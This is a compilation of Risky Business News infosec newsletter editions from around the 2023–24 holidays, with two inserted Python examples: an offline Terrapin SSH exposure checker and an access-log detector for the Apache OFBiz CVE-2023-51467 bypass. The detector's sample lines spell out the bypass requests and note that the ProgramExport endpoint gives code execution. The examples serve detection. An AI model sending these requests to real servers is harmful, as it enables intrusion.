Windows market share: Windows 10 held steady at around 67% of the Windows version market last year, while Windows 11 grew from 16% to 26%, according to StatCounter.

Government, politics, and policy

More FBI cyber agents abroad: The FBI has increased the number of cyber assistant legal attachés deployed at embassies across the globe. New legal attaché positions have been established in New Delhi, Rome, and Brasilia. The FBI began deploying cyber legal attachés in 2011 and currently employs 63 of them in countries including Australia, the Netherlands, Estonia, Romania, Ukraine, and Canada. The agents' main role is to work with local law enforcement to investigate and disrupt cybercrime operations. [Additional coverage in CyberScoop]

New CNMF chief: Marine Corps Maj. Gen. Lorna Mahlock has taken command of the Cyber National Mission Force, the US Cyber Command unit that conducts operations against foreign cyber threats. Maj. Gen. Mahlock replaces Army Maj. Gen. William Hartman, who was named Cyber Command's new deputy chief. [Additional coverage in The Record]

Greece to set up cybersecurity agency: The Greek government has published a draft law that will establish a National Cybersecurity Authority, a new agency aimed at bolstering the country's cyber defenses. [Additional coverage in BalkanInsight]

Sponsor section

In this Risky Business News sponsor interview Tom Uren talks to Chris St Myers, Stairwell’s head of threat research, about managing the risk from software you absolutely must use.

Cybercrime and threat intel

Pompompurin re-arrested: The FBI has re-arrested a hacker known as Pompompurin after the 21-year-old violated the conditions of his pretrial release. Officials say Conor Brian Fitzpatrick connected to the internet via a VPN from a computer without monitoring software installed. Fitzpatrick was initially arrested in March 2023 for running BreachForums, a cybercrime forum where hacked data was leaked and traded. He pleaded guilty to hacking and child pornography charges in July last year and was released on bond pending sentencing. His sentencing is scheduled for January 19, later this month. [Additional coverage in The Record]

xDedic fallout: The US Justice Department says that five years after shutting down the xDedic cybercrime marketplace, it has now identified and charged 19 individuals active on the site. Officials say they have now identified and handed down sentences to the site's main operators, two individuals from Moldova and Ukraine. Sentences have also been handed down to xDedic sellers and buyers, individuals who sold and bought hacked servers off the site. Many of these individuals were also charged with other crimes related to the exploitation of xDedic's inventory, with some sentences reaching 78 months in prison.

BEC scammer detained: US officials have indicted a Nigerian national on charges of allegedly stealing more than $7.5 million through BEC scams. Olusegun Samson Adejorin was arrested in Ghana on December 29 and is awaiting his extradition to the US. Two of Adejorin's victims are charitable organizations.

Follow-on extortion campaigns: Security firm Arctic Wolf reports that several victims hit by the Akira and Royal ransomware groups last year have been contacted by other criminal groups with new extortion demands. These second groups threatened to publish the victims' already-stolen data, or offered, for a fee, to hack into the first ransomware gang's servers and delete it. The groups used names like Ethical Side Group (ESG) and xanonymoux.

OpJapan: South Korean security firm S2W Talon has published a report looking at a hacktivism campaign tracked as #OpJapan, where various hacktivist groups targeted Japanese organizations after the country released treated water from the Fukushima nuclear plant back into the ocean.

New npm malware: Twenty-four malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.

PyPI malware: Fortinet researchers have spotted three malicious Python libraries on the official PyPI portal that were designed to deploy cryptocurrency miners on Linux systems.

Terrapin exposure: More than 11 million internet-connected devices are vulnerable to Terrapin (CVE-2023-48795), a prefix-truncation attack on the SSH handshake that lets a man-in-the-middle silently drop the first messages of the secure channel when ChaCha20-Poly1305, or a CBC cipher combined with Encrypt-then-MAC, is negotiated. According to a scan performed by the Shadowserver Foundation, nearly half of all systems with an exposed SSH port over IPv4 are vulnerable.
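Shadowserver's count is derived entirely from what servers advertise in their SSH_MSG_KEXINIT message, and you can run the same check against your own hosts. A server is exposed if it is willing to negotiate chacha20-poly1305@openssh.com, or any CBC cipher together with an -etm@openssh.com MAC, in either direction; the "strict kex" countermeasure (OpenSSH 9.6 and ports of it) defeats the attack only when both peers advertise it, which on the server side means kex-strict-s-v00@openssh.com in the kex list. The code below is an added example, not the Terrapin researchers' scanner or anything from Shadowserver: it serialises and parses KEXINIT payloads per RFC 4253 and applies those rules to constructed algorithm lists, so nothing touches the network.

```python
"""Decode an SSH_MSG_KEXINIT payload (RFC 4253 section 7.1) and judge Terrapin exposure.

Added example; not code from the Terrapin researchers or Shadowserver. The
KEXINIT payloads are constructed by build_kexinit(), nothing touches the network.
"""
import struct

SSH_MSG_KEXINIT = 20
NAME_LISTS = ("kex", "hostkey", "enc_c2s", "enc_s2c", "mac_c2s", "mac_s2c",
              "comp_c2s", "comp_s2c", "lang_c2s", "lang_s2c")
STRICT_KEX = {"server": "kex-strict-s-v00@openssh.com", "client": "kex-strict-c-v00@openssh.com"}


def build_kexinit(kex, hostkey, enc, mac, comp=("none",), cookie=b"\x00" * 16):
    """Serialize a KEXINIT payload; the same enc/mac lists are used for both directions."""
    payload = bytes([SSH_MSG_KEXINIT]) + cookie
    for names in (kex, hostkey, enc, enc, mac, mac, comp, comp, (), ()):
        raw = ",".join(names).encode("ascii")
        payload += struct.pack(">I", len(raw)) + raw
    return payload + b"\x00" + b"\x00\x00\x00\x00"   # first_kex_packet_follows, reserved


def parse_kexinit(payload):
    """Return the ten name-lists of a KEXINIT payload as a dict of Python lists."""
    if not payload or payload[0] != SSH_MSG_KEXINIT:
        raise ValueError("not an SSH_MSG_KEXINIT payload")
    offset = 1 + 16                                   # message type + random cookie
    lists = {}
    for field in NAME_LISTS:
        (length,) = struct.unpack_from(">I", payload, offset)
        offset += 4
        raw = payload[offset:offset + length].decode("ascii")
        offset += length
        lists[field] = raw.split(",") if raw else []
    return lists


def assess_terrapin(lists, role="server"):
    """Classify one peer's KEXINIT.

    Terrapin needs chacha20-poly1305@openssh.com, or a CBC cipher together with an
    Encrypt-then-MAC MAC, to be negotiable in at least one direction. The
    "strict kex" extension defeats it, but only when both peers advertise it, so a
    server that offers kex-strict-s-v00@openssh.com is reported as mitigated.
    """
    findings = []
    for direction in ("c2s", "s2c"):
        enc, mac = lists["enc_" + direction], lists["mac_" + direction]
        if "chacha20-poly1305@openssh.com" in enc:
            findings.append(f"{direction}: chacha20-poly1305@openssh.com offered")
        cbc = [c for c in enc if c.endswith("-cbc")]
        etm = [m for m in mac if m.endswith("-etm@openssh.com")]
        if cbc and etm:
            findings.append(f"{direction}: CBC cipher {cbc[0]} with EtM MAC {etm[0]}")
    if not findings:
        return "not affected", findings
    return ("mitigated by strict kex" if STRICT_KEX[role] in lists["kex"] else "vulnerable"), findings


# Constructed algorithm lists: a pre-9.6 OpenSSH-style server, the same server with
# strict kex added, a server restricted to AES-GCM, and a CBC + EtM server.
_COMMON_ENC = ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes256-gcm@openssh.com"]
_COMMON_MAC = ["umac-64-etm@openssh.com", "hmac-sha2-256"]
OLD_SERVER = build_kexinit(["curve25519-sha256"], ["ssh-ed25519"], _COMMON_ENC, _COMMON_MAC)
PATCHED_SERVER = build_kexinit(["curve25519-sha256", "kex-strict-s-v00@openssh.com"],
                               ["ssh-ed25519"], _COMMON_ENC, _COMMON_MAC)
GCM_ONLY_SERVER = build_kexinit(["curve25519-sha256"], ["ssh-ed25519"],
                                ["aes256-gcm@openssh.com"], ["hmac-sha2-256"])
CBC_ETM_SERVER = build_kexinit(["curve25519-sha256"], ["ssh-ed25519"],
                               ["aes256-cbc"], ["hmac-sha2-256-etm@openssh.com"])

if __name__ == "__main__":
    for name, payload in (("old", OLD_SERVER), ("patched", PATCHED_SERVER),
                          ("gcm-only", GCM_ONLY_SERVER), ("cbc-etm", CBC_ETM_SERVER)):
        print(name, *assess_terrapin(parse_kexinit(payload)))
```

To use this against a live host, read the server's KEXINIT after the version exchange (it is the first binary packet, sent unencrypted) and pass its payload, minus the packet framing, to parse_kexinit(). "Mitigated" is only as good as the clients: an old client that does not send kex-strict-c-v00@openssh.com still gets a vulnerable session, so removing the affected ciphers from the server configuration is the stronger fix where the client population is unknown.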

2023 crypto-hacks: Hackers have stolen more than $1.8 billion worth of crypto assets across 751 security incidents in 2023. The number is 51% down from the $3.7 billion lost a year before, in 2022. According to blockchain security firm CertiK, the top 10 most costly incidents accounted for more than $1.1 billion lost last year. The most costly incidents were linked to leaks or compromises of private keys, with more than $880 million stolen this way last year. Fairyproof has the 2023 crypto-heist stats at $1.23 billion across 489 incidents. According to TRM Labs, North Korean hackers were linked to $600 million stolen assets.

Malware technical reports

Mirai.TBOT: QiAnXin researchers have discovered a new Mirai-based botnet. Named Mirai.TBOT, the botnet has been active since August, infected more than 30,000 systems, and is mainly used for DDoS attacks. This is the same botnet that Akamai tracks as InfectedSlurs.

SilverRAT: CyFirma has published a report on SilverRAT, a new remote access trojan that launched in November of last year. According to researchers, the malware was created by a Syrian national going by the name of "Anonymous Arabic," who previously also created the S500 RAT. SilverRAT has a new feature meant to destroy system restore points, a feature that's unique among RATs sold online.

AsyncRAT: AlienLabs looks at some recent AsyncRAT samples the company has spotted in the wild over the past 11 months.

LockBit: Chinese security firm Xitan has published a report on the LockBit ransomware. 

Anti-analysis techniques: Palo Alto Networks looks at the recent anti-analysis techniques used by malware strains such as GuLoader and RedLine Stealer.

Sponsor Section

Stairwell's Mike Wiacek demonstrates Stairwell's file analysis and threat detection platform to Risky Business host Patrick Gray. Stairwell helps you monitor and analyze every executable file in your organization, automatically collecting crucial intelligence and providing your security team with in-depth visibility and detections.

APTs, cyber-espionage, and info-ops

Hafnium's persistence method: Researchers at Purple Team have looked at how Hafnium is modifying scheduled tasks on infected hosts to maintain persistence.

Bluenoroff's SpectralBlur: macOS malware researcher Patrick Wardle has published an analysis of SpectralBlur, a macOS backdoor linked to the DPRK's BlueNoroff cyber-espionage group.

UAC-0050: Uptycs looks at recent UAC-0050 spear-phishing campaigns pushing the RemcosRAT, also seen by Ukraine's CERT team.

SideWinder: Bridewell has published a report with details on new SideWinder infrastructure. SideWinder APT, also known as Rattlesnake, is one of the oldest nation-state threat actors that is believed to originate from India.

Patchwork: A Chinese security firm looks at recent Patchwork APT operations targeting China's energy sector.

No-Justice wiper: ClearSky has published a technical breakdown of No-Justice, the data wiper used by Iranian hacking group Homeland Justice in a recent attack targeting the Albanian Parliament and other local companies. The attack took place on December 24 last year. Homeland Justice is the same group that hacked and crippled the Albanian government in the summer of 2022.

Vulnerabilities, security research, and bug bounty

OFBiz exploitation: Threat actors are exploiting a recently disclosed vulnerability in OFBiz, an ERP solution from the Apache Foundation. The attacks began a week after SonicWall security researchers disclosed the bug in a blog post and after Apache patched the issue. Tracked as CVE-2023-51467, the vulnerability is an authentication bypass that can lead to SSRF and RCE attacks. Some parts of the OFBiz project are used in Atlassian products, but the company said its software is not affected.
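The bypass is easy to spot in web server logs. The public exploit for CVE-2023-51467 sends requirePasswordChange=Y together with empty or junk USERNAME and PASSWORD parameters to an OFBiz control servlet; the login check then treats the request as authenticated, and the attacker points it at an endpoint that executes code (ProgramExport, which evaluates Groovy) or at the XML-RPC deserialization surface the earlier CVE-2023-49070 fix was meant to close. The detector below is an added example, not code from SonicWall or the Apache OFBiz project; it runs over constructed combined-format access log lines with documentation IP ranges.

```python
"""Spot CVE-2023-51467 exploitation attempts in web server access logs.

Added example; not code from SonicWall or the Apache OFBiz project. The bypass
sends requirePasswordChange=Y with empty or junk USERNAME/PASSWORD values to an
OFBiz control servlet. The access-log lines are constructed (combined log format)
and use documentation IP ranges.
"""
import re
from urllib.parse import parse_qs, urlsplit

ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Control-servlet endpoints that public exploitation chained behind the bypass.
HIGH_VALUE = {
    "ProgramExport": "arbitrary Groovy execution",
    "xmlrpc": "XML-RPC deserialization surface (CVE-2023-49070)",
}


def classify_request(line):
    """Return a finding for a request that carries the bypass parameter, else None."""
    m = ACCESS_LINE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    params = parse_qs(url.query, keep_blank_values=True)   # keep 'USERNAME' with no value
    if "/control/" not in url.path or params.get("requirePasswordChange", [""])[0].upper() != "Y":
        return None
    endpoint = url.path.rstrip("/").rsplit("/", 1)[-1]
    return {
        "client": m["ip"], "time": m["time"], "method": m["method"], "endpoint": endpoint,
        "status": int(m["status"]), "username": params.get("USERNAME", [""])[0],
        "severity": "high" if endpoint in HIGH_VALUE else "medium",
        "note": HIGH_VALUE.get(endpoint, "authentication bypass probe"),
    }


def scan_access_log(lines):
    return [finding for finding in map(classify_request, lines) if finding]


SAMPLE_ACCESS_LOG = [
    '203.0.113.9 - - [05/Jan/2024:03:14:07 +0000] "GET /webtools/control/ping?USERNAME&PASSWORD=s'
    '&requirePasswordChange=Y HTTP/1.1" 200 4',
    '203.0.113.9 - - [05/Jan/2024:03:14:09 +0000] "POST /webtools/control/ProgramExport?USERNAME&'
    'PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 200 1312',
    '198.51.100.4 - - [05/Jan/2024:03:20:41 +0000] "GET /control/login HTTP/1.1" 200 8801',
    '198.51.100.4 - - [05/Jan/2024:03:20:55 +0000] "POST /control/login?USERNAME=alice&PASSWORD=x'
    '&requirePasswordChange=N HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_ACCESS_LOG):
        print(finding["severity"], finding["client"], finding["endpoint"], finding["note"])
```

A 200 on the ping probe (the body is the four-byte "PONG") tells the attacker the bypass works; a 200 on ProgramExport from the same client seconds later is the code execution. Access logs only show query strings, so if the parameters are sent in a POST body you need the application's own logs or a WAF in front of it; on a server that is already patched, the same probe returns an error and the finding is still worth keeping as an indicator of who is scanning.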

Bitwarden vulnerability: Password management application Bitwarden has fixed a major vulnerability that could have allowed threat actors to remotely steal a user's password vault without knowing the password or requiring biometric authentication.

Ivanti EPM security update: Ivanti has published a security update for its Endpoint Manager (EPM) server. Tracked as CVE-2023-39336, this is an SQL injection vulnerability rated critical (9.6/10).

QNAP security updates: Taiwanese company QNAP has released security updates to fix 12 vulnerabilities across several products.

OpenOffice security updates: The Apache Foundation has released a security update for the OpenOffice software suite that fixes four vulnerabilities.

PHP library vulnerability: CERT-PL has found a vulnerability (CVE-2023-6551) in a popular PHP library used to handle image uploads.

2023 vulnerabilities: Cisco's Jerry Gamblin has published a statistical overview of 2023's CVEs. In total, there were 28,902 published CVEs, up 15% from 2022. Thirty-six CVEs scored a "perfect" 10.0. Less than 1% were routinely exploited in the wild, according to the Qualys 2023 Threat Landscape report.

Infosec industry

Acquisition news #1: Airbus is in talks to buy Atos, a prominent EU cybersecurity company.

Acquisition news #2: SentinelOne announced its intention to acquire cloud-native application protection platform PingSafe.

Acquisition news #3: SonicWall has acquired Banyan Security, a zero-trust network access and security service edge (SSE) provider.

Acquisition news #4: Mimecast has acquired Elevate Security, an email security company specializing in human behaviors and risk.

New tool—SSH-Snake: Security researcher Joshua Rogers has open-sourced SSH-Snake, a tool designed to perform automatic network traversal using SSH private keys discovered on systems. Rogers says the tool's main objective is to create a comprehensive map of a network and its dependencies to identify the extent to which a network can be compromised using SSH and SSH private keys starting from a particular system.

New tool—Galah: Niantic Labs security engineer Adel Ka has released Galah, a web honeypot that uses OpenAI models to generate responses to incoming HTTP requests.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about recent hints that the Ukrainian government has figured out how to make use of the IT Army.

Risky Biz News: New Google exploit lets threat actors revive expired cookies

3 January 2024 at 00:30

You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

The RiskyBiz crew behind our newsletters and podcasts is on hiatus between December 8 and January 8 for the winter holidays, but we put out this weekly edition with some of the past week's biggest infosec stories.

Happy holidays!


Breaches, hacks, and security incidents

Albanian cyberattacks: Albania's cybersecurity agency (AKCESK) says major cyberattacks have targeted the networks of the country's parliament and its largest telco, ONE Albania. The attacks took place on December 25. The agency did not make a formal attribution.

SnappFood leak: An Iranian hacking group named IR Leaks has leaked the data of more than 20 million users of SnappFood, Iran's largest food delivery app. The same group also dumped databases from several other Iranian companies. [Additional coverage in Iran International]

Evotor cyberattack: The IT Army of Ukraine has taken credit for a cyberattack that crippled the operations of Evotor, a Russian company that makes and operates online cash registers used across Russia.

BELTA attack: Belarusian hacktivist group Cyber Partisans has hacked and wiped the network of the Belarusian Telegraph Agency (BELTA), the country's state-owned news agency.

EPS ransomware attack: Serbian public energy company EPS and the Serbian government are staying silent about a ransomware attack that hit the organization around the Christmas holiday. [Additional coverage in BalkanInsight]

EasyPark cyberattack: EasyPark, the largest parking app operator in Europe, has disclosed a security breach.

Ohio Lottery cyberattack: The Ohio Lottery has suffered a cybersecurity attack, which is preventing some winners from claiming their prizes. [Additional coverage in WCPO]

Downfall incident: A developer of Downfall, a mod for the indie game Slay the Spire, had his account hacked, allowing the attackers to insert malware into the mod's Steam release. The compromise took place on Christmas Day, and the trojanized update deployed an infostealer to users' systems.

Telcoin cyber-heist: A threat actor stole $1.2 million worth of tokens from the Telcoin project. [Additional coverage in CoinDesk]

Levana cyber-heist: Hackers stole $1.1 million worth of assets from the Levana Protocol. [Additional coverage in Rekt News]

Orbit Bridge cyber-heist: On the last day of 2023, a hacker stole almost $82 million worth of crypto-assets from cross-chain exchange Orbit Bridge. Happy New Year!!!

General tech and privacy

Microsoft disables ms-appinstaller protocol: Microsoft has disabled the ms-appinstaller protocol in Windows by default after several threat actors began abusing it to install malware on user devices throughout November 2023. The company says that groups like Storm-0569, Storm-1113, Storm-1674, and Sangria Tempest have been spotted abusing the protocol.

Google settles lawsuit: Google has settled the $5 billion lawsuit in which it was accused of tracking users even when they were in Chrome's private mode. The terms of the settlement were not disclosed, but they will most likely become public when the settlement is presented to the court for approval. [Additional coverage in the BBC]

Privacy Sandbox Protected Audience API: Lukasz Olejnik has published a privacy analysis of the Privacy Sandbox Protected Audience API, the new user tracking technology that is currently shipping with Chrome.

Google Groups ends Usenet support: Google is ending support for its Usenet integration on Google Groups on February 22, 2024. The company says it took the decision to combat spam.

Steam drops old Windows versions: With the new year, Steam has dropped support for Windows 7 and Windows 8, citing security reasons.

Cars and the 4th Amendment: Car data is apparently not safeguarded by 4th Amendment protections, meaning cops can access it without a warrant. This is possible thanks to a loophole/exception in US law since the Prohibition era. [Additional coverage in The Record]

XCast settlement: The US DOJ and FTC have settled with XCast Labs, a company that provided infrastructure for spammy telemarketers. Under the proposed court order, XCast Labs will be required to implement a screening process and end its relationships with firms that are not complying with telemarketing-related laws.

Keybase outage: Encrypted instant messaging service Keybase has had a major outage after a certificate with a 10-year validity period expired without anyone noticing in time. Since the start of the year, the vendor has been shipping software updates to rotate the certificate across its apps.

WiFi 7: The WiFi 7 standard is expected to arrive later in 2024. IEEE Spectrum has a breakdown of all the new changes. The main new feature is multi-link operation (MLO).

Apple-Corellium legal battle: Apple and cybersecurity company Corellium have settled their four-year-old legal battle. The terms of the settlement were not disclosed. Apple sued Corellium in 2019 over its iOS virtualization technology. [Additional coverage in Forbes]

Mozilla outrage: Many Firefox and privacy advocates are upset that Mozilla's CEO received $7 million in compensation last year even as Firefox lost a large chunk of its browser share this year.

Let's Encrypt stats: In its end-of-year report, Let's Encrypt says its certificates are now used on more than 360 million websites, up 40 million from last year.

Government, politics, and policy

South Korea sanctions North Korean spy chief: Seoul authorities have sanctioned eight North Korean officials for their role in the country's intercontinental ballistic missile program. Among the sanctioned individuals is Ri Chang Ho, the head of the country's intelligence agency, the RGB. South Korean officials say Ri has helped fund the program through the RGB's illicit cyber operations. [Additional coverage in The Straits Times]

Moldova sets up cybersecurity agency: With help from Estonian officials, Moldova has set up a national cybersecurity agency.

Risky Business Podcasts

In this podcast, Patrick Gray and Tom Uren talk about whether election interference will take place in the Taiwanese, US, and Russian elections that are all taking place in 2024. They also look at a ChatGPT-powered online harassment campaign.

Cybercrime and threat intel

Ransomware gang arrest: Chinese police detained two individuals from Hohhot who were involved in ransomware attacks against Chinese organizations. Officials say the group used ChatGPT to optimize the code of their ransomware, which they used to encrypt corporate servers and demand $20,000 in ransom. [Additional coverage in Global Times]

Orgon sentencing: A Colombian judge has sentenced Andres Felipe Cardoso Alvarez to three years and five months in prison. Alvarez was known as Orgon, a member of the Anonymous Colombia hacking group. As part of the group, he launched attacks against a large number of government organizations.

Cyber Toufan wiping spree: The data-wiping spree started by the Cyber Toufan group at the end of November is still going strong. The group has now wiped more than 100 organizations, with the vast majority being based in Israel. Around 40% of the victims were hit after the group compromised their MSP.

Iranian phishing/wiping campaign: Israel's CERT team says Iranian hackers have continued their phishing campaign where they pose as F5 and lure victims into running a data wiper on their equipment. The campaign has now been running for more than a month.

Spyware in India: Amnesty International has confirmed that the Pegasus spyware was used in attacks against Indian journalists. The confirmation comes after Apple notified victims about the attack at the start of December 2023 but did not say what kind of malware was used. Amnesty says the Pegasus spyware was deployed on infected devices between August and October 2023. In the meantime, WaPo reports that Indian government officials have pressured Apple to change the tone of its warnings in a way that doesn't incriminate them.

New ransomware strain: Symantec researchers have spotted a new ransomware strain named TISAK in the wild.

Crypto drainers in 2023: Crypto-draining phishing kits have been used to steal more than $300 million worth of crypto assets from more than 320,000 victims throughout last year.

Redline dominates 2023: The top most analyzed malware on the ANY.RUN platform in 2023 was the Redline infostealer, the same as last year.

Mac malware of 2023: Patrick Wardle has published a review of last year's most common macOS malware strains.

Malware technical reports

Marble Framework: In an interesting experiment, malware analysts from HackerHouse have used AI/ML tools to reconstruct the (incomplete) source code of the Marble Framework, a malware toolkit initially shared in the CIA Vault7 leaks.

Rhysida ransomware: Logpoint researchers have published a technical report on the Rhysida ransomware, a RaaS that began operations in May 2023.

8Base ransomware: Fortinet looks at the recent activity of the 8Base ransomware gang.

Black Basta decrypter: Tobias Mueller of SRLabs has developed a free decrypter for the Black Basta ransomware. The decrypter was released at the 37C3 conference last week. It allows victims to recover files locked by the group between November 2022 and December 2023. The Black Basta gang has fixed the bug exploited by the decrypter.

MetaStealer: eSentire researcher RussianPanda has published part two of an analysis of MetaStealer. Part one is here. The infostealer launched in March 2022 and incorporates code from Redline Stealer, as its creator candidly admitted back then. The malware is different from the MetaStealer that SentinelOne discovered last year, which is written in Go and targets macOS exclusively.

Pure Logs Stealer: The same researcher also has an analysis of Pure Logs Stealer, a more recent infostealer, which RussianPanda says "fails to impress."

Sponsor Section

In this product demo, GreyNoise founder and CEO Andrew Morris demonstrates how people use the GreyNoise sensor network.

APTs, cyber-espionage, and info-ops

Kimsuky: AhnLab has published an analysis of recent Kimsuky operations that employed the group's macOS malware AppleSeed.

Kremlin spams overseas Ukrainians: Ukraine's GUR intelligence service says Ukrainians living abroad have received a wave of spam messages urging them to help Russia expel "American Satanists" from Ukraine's "primarily Russian land." The incident comes as Ukrainian officials warned that the Kremlin is preparing new disinformation efforts across the EU, something French officials also warned about.

APT28: Ukraine's CERT team has spotted Russia's APT28 hacking group launching new spear-phishing operations against Ukrainian targets between December 15 and 25. The final payload was malware strains such as MASEPIE, OCEANMAP, and STEELHOOK.

Operation Triangulation: Kaspersky researchers say they found evidence that the Operation Triangulation spyware attacks abused a secret hardware feature in iOS devices to bypass hardware-based security protections (CVE-2023-38606). The operation targeted Russian government officials, foreign diplomats working in Russia, and Kaspersky employees. Russia's FSB intelligence service linked the attack to the NSA and claimed Apple cooperated with the American spy agency.

Vulnerabilities, security research, and bug bounty

New Google exploit: Several malware developers have found a new exploit that allows them to revive expired Google cookies and access accounts even after users change their passwords. The technique has been used in the wild since October, according to Hudson Rock, CloudSEK, and independent threat intel analysts. Infostealers seen using it include Lumma, Rhadamanthys, RisePro, Meduza, and Stealc. The exploit allegedly relies on an undocumented Google OAuth endpoint named MultiLogin.

Juniper security updates: Juniper has released a security update to patch 18 vulnerabilities in its JSA (Juniper Secure Analytics) series.

D-Link unpatched vulnerability: Tenable has found a vulnerability in the D-Link D-View network management utility that can be used to leak device passwords. The issue is still unpatched.

Spreadsheet::ParseExcel patches: A security update has been released for Spreadsheet::ParseExcel, the Perl module that got exploited as part of the recent attacks on Barracuda ESG appliances. Apparently, an exploit for this Perl module has been available in the wild for months.

Apache OFBiz auth bypass: SonicWall researchers have found an authentication bypass in Apache OFBiz servers (CVE-2023-51467).

GKE Fluent Bit vulnerability: Palo Alto Networks has published a write-up on an elevation-of-privilege vulnerability it found in the Fluent Bit logging agent of the Google Kubernetes Engine, patched earlier in December.

PandoraFMS vulnerabilities: NCC Group has found 18 vulnerabilities in PandoraFMS, an enterprise-scale network monitoring and management application.

Ethereum ABI vulnerability: Trail of Bits has found a parsing vulnerability in libraries that support Ethereum ABI binary parsing functionality.

"At the time of writing, the bug is fixed only in the Python library. All other libraries decided on full disclosure through GitHub issues."

WinSxS hijacking: Security Joes have found a new DLL hijacking technique that exploits the WinSxS folder.

DsmSvc analysis: Germany's BSI cybersecurity agency has published a security analysis of the Windows 10 Device Setup Manager Service (DsmSvc) driver management utility.

Tesla Elon mode: Three security researchers used a voltage drop glitch to jailbreak a Tesla car's autopilot and gain root access to the car and autopilot system. With this access, the group activated a previously unknown feature named Elon Mode, which gave them full control over the car.

Infosec industry

37C3 videos: Talks from the 37th Chaos Communication Congress (37C3) security conference, which took place at the end of December in Germany, are available on YouTube.

New tool—SecButler: Security firm GroundSec has released SecButler, a collection of tools for pen-testers and bug bounty hunters.

New tool—Domainim: Russian software developer pptx704 has released Domainim, a domain reconnaissance tool for organizational network scanning.

New tool—EDRSilencer: Security researcher Chris Au has released EDRSilencer, a tool that silences EDR solutions and prevents them from reporting security events to their servers.

New tool—Honeydet: Security researcher James Brine has open-sourced Honeydet, a tool to detect online honeypots.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about recent hints that the Ukrainian government has figured out how to make use of the IT Army.

Risky Biz News: Barracuda discloses ESG zero-day on Xmas Eve

27 December 2023 at 00:30

You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

The RiskyBiz crew behind our newsletters and podcasts is on hiatus between December 8 and January 8 for the winter holidays, but we put out this weekly edition with some of the past week's biggest infosec stories.

Happy holidays!


Breaches, hacks, and security incidents

Rosvodokanal hack: A Ukrainian hacker group named BlackJack has breached and destroyed the IT infrastructure of Rosvodokanal, a major Russian water-supply company. The group says it carried out the attack in response to Russia's cyberattack on Ukraine's Kyivstar mobile telco. BlackJack told reporters they had assistance from Ukraine's SSU intelligence service. The agency didn't confirm. [Additional coverage in RBC-Ukraine]

Bitrix24 attack: Ukraine's IT Army took credit for DDoS attacks that took down Bitrix24, Russia's largest CRM provider. [Additional coverage in The Record]

VF Corp incident: VF Corp, the company behind retail brands such as Vans, Dickies, and Timberland, says it suffered a cybersecurity incident. VF Corp declined to comment on whether the incident was a ransomware attack. [Additional coverage in RetailDive]

National Amusements incident: National Amusements, the company behind CBS and Paramount, disclosed a cybersecurity incident. The breach took place in December 2022 but was only recently discovered. More than 82,000 people had their data stolen in the incident. [Additional coverage in TechCrunch]

First American incident: First American, the second largest title insurance company in the US, shut down its IT systems in the aftermath of a cyberattack. The incident took place after the AlphV gang hit Fidelity National, the largest title insurer in the US, at the end of November.

Mint Mobile breach: Mint Mobile has disclosed a new data breach.

Bedroom footage sold online: Private camera footage from bedrooms, changing rooms, toilets, and massage parlors in Vietnam has been hacked and put on sale online. [Additional coverage in VNExpress]

All the apes are safe: Yuga Labs co-founder Greg Solano has paid a hacker a bounty of 120 ETH ($275,000) to return 36 Bored Ape Yacht Club (BAYC) and 18 Mutant Ape Yacht Club (MAYC) NFTs that were stolen during a hack of the NFT Trader platform in early December. NFTs worth nearly $3 million were stolen in the hack, but the apes are now safe! [Additional coverage in Cointelegraph]

GTA V code leaks online: Hackers have leaked the source code of GTA V. The code was stolen in September 2022 by Arion Kurtaj, a member of the Lapsus$ hacking crew. The code was released following Kurtaj's sentencing. [Additional coverage in RockstarIntel]

Ubisoft probes hack: A threat actor claims to have hacked and stolen more than 900GB of data from gaming studio Ubisoft. The company said it's investigating the claims and has not confirmed a breach. [Additional coverage in Xfire]

General tech and privacy

Chrome Safety Check: Google has announced that Safety Check, the feature that scans for compromised user passwords, will now continuously run in the background at all times.

"We're also extending Safety Check to revoke sites' permissions — like access to your location or microphone — if you haven't visited them in a long time. And Safety Check will now flag if you’re getting a lot of notifications from sites you don’t engage with that much, so you can easily disable them."

Wikimedia RU shuts down: Wikimedia RU, the Russian non-profit that supported the Russian-language Wikipedia, has dissolved after authorities designated its director as a "foreign agent." Russian Wikipedia itself remains online.

Substack Against Nazis: A group of more than 100 Substack writers, organized under the name "Substack Against Nazis," has signed an open letter asking Substack to remove white supremacist and Nazi newsletters hosted on the platform, threatening to leave if the company fails to act.

Government, politics, and policy

FTC COPPA update: The US FTC has put forward a series of updates meant to strengthen the Children's Online Privacy Protection Act (COPPA) and put new restrictions on the collection and use of children's data.

"The proposal aims to shift the burden from parents to providers to ensure that digital services are safe and secure for children. [...] The rule also limits the personal data that websites and other online services can collect from children, limits how long they can retain such data, and requires them to secure the data."

GAO report on medical device cybersecurity: The US Government Accountability Office has published a report on the cybersecurity of medical devices. The agency recommended that CISA and the FDA update their collaboration agreement, which is now five years old and outdated in the face of the current threat landscape.

EU CSA: EU lawmakers have reached a provisional agreement on the EU Cyber Solidarity Act, a new regulation that will give member states a quick way to share information on large-scale cyberattacks.

Tallinn Mechanism: Ukraine's partners have activated the Tallinn Mechanism, a new system to provide cyber and military aid to the besieged country.

Israel-Hamas war: Israel's National Cyber Directorate says that 15 hacking groups associated with Iran, Hezbollah, or Hamas have launched attacks against Israel since the October 7 attacks. [Additional coverage in Calcalist]

IDF censorship: The Israeli military has prohibited Israeli media from reporting on cyberattacks targeting the government and on cyber operations carried out by officials as part of its war on Hamas. [Additional coverage in The Intercept]

Risky Business Podcasts

In this podcast, Patrick Gray and Tom Uren talk about whether election interference will take place in the Taiwanese, US, and Russian elections that are all taking place in 2024. They also look at a ChatGPT-powered online harassment campaign.

Cybercrime and threat intel

